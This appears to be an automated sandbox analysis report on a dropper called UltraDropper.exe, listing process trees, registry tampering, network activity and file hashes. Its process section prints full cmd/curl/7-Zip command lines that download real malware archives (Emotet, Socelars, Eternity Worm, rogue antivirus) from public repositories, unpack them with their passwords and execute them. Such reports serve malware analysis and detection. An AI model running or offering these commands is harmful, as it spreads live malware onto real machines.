Description Indicator Process Target
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Worm (1).exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 812 wrote to memory of 244 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 244 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 244 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 244 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 244 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 244 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 244 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\7-Zip\7z.exe
PID 244 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\7-Zip\7z.exe
PID 812 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 228 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 228 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 228 wrote to memory of 4372 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\7-Zip\7z.exe
PID 228 wrote to memory of 4372 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\7-Zip\7z.exe
PID 812 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 1452 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 1452 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 1452 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 1452 wrote to memory of 416 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\7-Zip\7z.exe
PID 1452 wrote to memory of 416 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\7-Zip\7z.exe
PID 812 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4944 wrote to memory of 3960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4944 wrote to memory of 3960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4944 wrote to memory of 3960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4944 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\7-Zip\7z.exe
PID 4944 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\7-Zip\7z.exe
PID 812 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 3444 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 3444 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 3444 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 3444 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\7-Zip\7z.exe
PID 3444 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\7-Zip\7z.exe
PID 812 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 704 wrote to memory of 3716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 704 wrote to memory of 3716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 704 wrote to memory of 3716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 704 wrote to memory of 4296 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\7-Zip\7z.exe
PID 704 wrote to memory of 4296 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\7-Zip\7z.exe
PID 812 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe C:\Windows\SysWOW64\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "67108863" \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" \??\c:\windows\antivirus-platinum.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe

"C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet%20(Epoch5)%20-%2004.11.2022%20.zip" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\curl.exe

curl -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet%20(Epoch5)%20-%2004.11.2022%20.zip"

C:\Program Files\7-Zip\7z.exe

"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\curl.exe

curl -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip"

C:\Program Files\7-Zip\7z.exe

"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\curl.exe

curl -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip"

C:\Program Files\7-Zip\7z.exe

"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\curl.exe

curl -L -o "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip"

C:\Program Files\7-Zip\7z.exe

"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\socelars.zip" "https://github.com/Princekin/malware-database/raw/main/Socelars%20Trojan/Socelars%20-%2024.09.2022.zip" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\socelars.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\curl.exe

curl -L -o "C:\Users\Admin\AppData\Local\Temp\socelars.zip" "https://github.com/Princekin/malware-database/raw/main/Socelars%20Trojan/Socelars%20-%2024.09.2022.zip"

C:\Program Files\7-Zip\7z.exe

"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\socelars.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\eternity.zip" "https://github.com/Princekin/malware-database/raw/main/Eternity%20Project/Eternity%20Worm%20-%2009.11.2022.zip" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\eternity.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\curl.exe

curl -L -o "C:\Users\Admin\AppData\Local\Temp\eternity.zip" "https://github.com/Princekin/malware-database/raw/main/Eternity%20Project/Eternity%20Worm%20-%2009.11.2022.zip"

C:\Program Files\7-Zip\7z.exe

"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\eternity.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

cmd /c regsvr32.exe "C:\Users\Admin\AppData\Local\Temp\emotet.dll"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Install.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Worm (1).exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe "C:\Users\Admin\AppData\Local\Temp\emotet.dll"

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Install.exe

C:\Users\Admin\AppData\Local\Temp\Install.exe

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\is-QA5O7.tmp\is-CUTJ3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QA5O7.tmp\is-CUTJ3.tmp" /SL4 $60242 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808

C:\Users\Admin\AppData\Local\Temp\Worm (1).exe

"C:\Users\Admin\AppData\Local\Temp\Worm (1).exe"

C:\Windows\system32\regsvr32.exe

"C:\Users\Admin\AppData\Local\Temp\emotet.dll"

C:\WINDOWS\302746537.exe

"C:\WINDOWS\302746537.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E186.tmp\302746537.bat" "

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\regsvr32.exe

C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TJuyUQjl\qiBEkCgZrHL.dll"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\comctl32.ocx

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\mscomctl.ocx

\??\c:\windows\antivirus-platinum.exe

c:\windows\antivirus-platinum.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h c:\windows\antivirus-platinum.exe

C:\Program Files (x86)\RegistrySmart\RegistrySmart.exe

"C:\Program Files (x86)\RegistrySmart\RegistrySmart.exe"

C:\Program Files (x86)\RegistrySmart\Launcher.exe

"C:\Program Files (x86)\RegistrySmart\Launcher.exe" 0:

C:\Program Files (x86)\RegistrySmart\RegistrySmart.exe

"C:\Program Files (x86)\RegistrySmart\RegistrySmart.exe" launch

Network

Country Destination Domain Proto
N/A 127.0.0.1:49736 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:49743 tcp
N/A 127.0.0.1:49751 tcp
GB 20.26.156.215:443 github.com tcp
N/A 127.0.0.1:49754 tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:49761 tcp
N/A 127.0.0.1:49764 tcp
N/A 127.0.0.1:49771 tcp
GB 20.26.156.215:443 github.com tcp
N/A 127.0.0.1:49774 tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:49781 tcp
N/A 127.0.0.1:49784 tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:49792 tcp
N/A 127.0.0.1:49795 tcp
US 34.117.59.81:443 ipinfo.io tcp
US 104.26.5.15:443 db-ip.com tcp
US 104.26.5.15:443 db-ip.com tcp
US 104.17.28.25:80 www.maxmind.com tcp
DE 49.12.226.201:80 tcp
N/A 224.0.0.251:5353 udp
DE 49.12.226.201:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip

MD5 ebe6bc9eab807cdd910976a341bc070d
SHA1 1052700b1945bb1754f3cadad669fc4a99f5607b
SHA256 b0353f4547466a0a402198b3750d928fc7c4e96dd3adc00b181e9d98e4602ea7
SHA512 9a6bfcb90c1e24be1b930990dd2af72e889f71ad7e1a7b8353b6522a625e2ae36013793ee2c159880bd510b8f785ce4c9dfced1d2901d3ca8f091e26084185a8

C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip

MD5 ab1187f7c6ac5a5d9c45020c8b7492fe
SHA1 0d765ed785ac662ac13fb9428840911fb0cb3c8f
SHA256 8203f1de1fa5ab346580681f6a4c405930d66e391fc8d2da665ac515fd9c430a
SHA512 bbc6594001a2802ed654fe730211c75178b0910c2d1e657399de75a95e9ce28a87b38611e30642baeae6e110825599e182d40f8e940156607a40f4baa8aeddf2

C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip

MD5 ff84853a0f564152bd0b98d3fa63e695
SHA1 47d628d279de8a0d47534f93fa5b046bb7f4c991
SHA256 3aaa9e8ea7c213575fd3ac4ec004629b4ede0de06e243f6aad3cf2403e65d3f2
SHA512 9ea41fe0652832e25fe558c6d97e9f9f85ccd8a5f4d00dbcc1525a20a953fbd76efb64d69ce0fdd53c2747159d68fcb4ac0fa340e0253b5401aebc7fb3774feb

C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip

MD5 7958e5251e5e6f9c3b7752ff1543e28a
SHA1 86f6a8439ce6a6b30e6347c5bde7e091e5fad0ac
SHA256 b31c3f9d08337314050552a7dfdceaf42bb6d22baee287cde6238a6d965d87cd
SHA512 aec50b136792aebbd5aa8e5d316c39b728ff28e411dd54db99a18d5c7b9447f25629c4220800ee8dd8cd2b24a98a11d46f32b45a62bda5135c2ff0a731e032ee

memory/812-16-0x0000000000220000-0x0000000000234000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\socelars.zip

MD5 ccaf8b6a14e94e5163c55b0b84a6a97c
SHA1 47c67a525e642808a1ce9a6ce632bc1e1fd3dfae
SHA256 966b5aa687ca823f72ed6054802e3347908fe1ace10336e682d96d5d66db68ae
SHA512 e82c8dd091dec5cb4e522296784c8e586a186af10598b6ad9f9feaa996c0898bb6988f602e8a32741a24bcb9f4c11e07d806e3323a46aeaafaee93b7cc1756c7

C:\Users\Admin\AppData\Local\Temp\eternity.zip

MD5 a68f97544c9b41270008b8bf68992a75
SHA1 a1ccc56eca977792cf7a751dff4ebf1f8afe8591
SHA256 eae2bbca8b001849a03bad0b21d9e876c1931685ce37876e08a9dc77e022bfad
SHA512 9bb6e21c98dada07b3c0d0c7f6addaf9d043441282fc5df4c5f348fffac047e5e662ef92a9f9df617cab79e1abbbb8648a4a3a32c1f2044aebf278fcdbdf68b3

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 0002dddba512e20c3f82aaab8bad8b4d
SHA1 493286b108822ba636cc0e53b8259e4f06ecf900
SHA256 2d68fe191ba9e97f57f07f7bd116e53800b983d267da99bf0a6e6624dd7e5cf7
SHA512 497954400ab463eb254abe895648c208a1cc951ecb231202362dadbe3ffb49d8d853b487589ce935c1dc8171f56d0df95093ffc655c684faa944c13bcfd87b8b

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 7dfbfba1e4e64a946cb096bfc937fbad
SHA1 9180d2ce387314cd4a794d148ea6b14084c61e1b
SHA256 312f082ea8f64609d30ff62b11f564107bf7a4ec9e95944dfd3da57c6cdb4e94
SHA512 f47b05b9c294688811dd72d17f815cce6c90f96d78f6835804d5182e2f4bfbd2d6738de854b8a79dea6345f9372ba76a36920e51e6cb556ef4b38b620e887eb4

C:\Users\Admin\AppData\Local\Temp\Install.exe

MD5 3c23db5eff4d85d8ff9addb170e32d53
SHA1 1f109f5b9b17a71e4ef7e200fccab72b21836017
SHA256 c2c694174fbf54aa19e05636589ac4eaf81d6b342c96be869bf57da18b930d98
SHA512 ad428facaddaba14acc1979ad6d93c4f665f58b4c9d14b28f2c0c1818290abe9dbbbd4e1c464bd8d38caebb101d6e4e85cf85fdaf423a0f3f5d0d134d8953f69

C:\Users\Admin\AppData\Local\Temp\is-QA5O7.tmp\is-CUTJ3.tmp

MD5 19672882daf21174647509b74a406a8c
SHA1 e3313b8741bd9bbe212fe53fcc55b342af5ae849
SHA256 34e6fea583cf1f995cf24e841da2060e0777405ac228094722f17f2e337ccea8
SHA512 eceddd4f1bbaf84dde72642f022b86033ba5a8b5105c573adcc49946d172e26e2512edce6f99e78dd3a2b0f8a23fa6138cca995a824e5f53a6ba925de434fa8f

C:\Users\Admin\AppData\Local\Temp\emotet.dll

MD5 56bb8500d7ab6860760eddd7a55e9456
SHA1 e9b38c5fb51ce1a038f65c1620115a9bba1e383d
SHA256 b4bead39ead2a29de2f0a6fb52eea172cfe25224b71e4a9b1418f55c8b053d59
SHA512 83ceff476d071412b02bab0753bd3c4440937b663397d73349fa90c38d96cf88051b645c781cbe5de281aa3bd45e71da7fcc8c99c2846ce29c2f36c3e1307a84

C:\Users\Admin\AppData\Local\Temp\Worm (1).exe

MD5 4a9ffb6962544b4dd55ce6ff568810b7
SHA1 a04a58215250d0bbe79fd946e6f5a73e8be27133
SHA256 8102f6139e928e1e844e7625f41bfa2b65f6ba05e95c43f1ecb329d72a91592b
SHA512 5b7e84b8a49200960a5312a373ef6245c2d997b5e3b9a761cb15a83ffe2edf9dc860c1bcd7ebb9eb7cd774c6f1364d505016446f713acfdfb682bb01c148053b

memory/3116-49-0x0000000000400000-0x0000000000A06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 382430dd7eae8945921b7feab37ed36b
SHA1 c95ddaebe2ae8fbcb361f3bf080d95a7bb5bf128
SHA256 70e5e902d0ac7534838b743c899f484fe10766aefacc6df697219387a8e3d06b
SHA512 26abc02bde77f0b94613edc32e0843ac71a0a8f3d8ba01cb94a42c047d0be7befef52a81984e9a0fa867400082a8905e7a63aaaf85fa32a03d27f7bc6a548c3b

memory/1020-58-0x0000000000180000-0x00000000002D2000-memory.dmp

memory/3304-55-0x00000000009E0000-0x0000000000A10000-memory.dmp

memory/920-30-0x0000000000400000-0x0000000000415000-memory.dmp

memory/1020-59-0x0000000005240000-0x00000000057E6000-memory.dmp

C:\Windows\302746537.exe

MD5 8703ff2e53c6fd3bc91294ef9204baca
SHA1 3dbb8f7f5dfe6b235486ab867a2844b1c2143733
SHA256 3028a2b0e95143a4caa9bcd6ae794958e7469a20c6e673da067958cbf4310035
